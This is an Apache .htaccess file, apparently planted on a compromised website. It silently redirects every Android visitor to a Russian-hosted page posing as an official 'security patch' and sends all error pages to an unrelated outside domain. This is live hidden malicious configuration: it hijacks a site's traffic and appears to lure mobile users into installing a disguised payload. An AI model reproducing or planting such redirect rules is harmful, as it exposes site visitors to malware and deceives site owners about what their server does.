RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} .*ndroid.*
RewriteRule ^(.*)$ http://official.androidsecuritydata.ru/securitypatch.php
ErrorDocument 400 http://ffoxer.com
ErrorDocument 401 http://ffoxer.com
ErrorDocument 403 http://ffoxer.com
ErrorDocument 404 http://ffoxer.com
ErrorDocument 500 http://ffoxer.com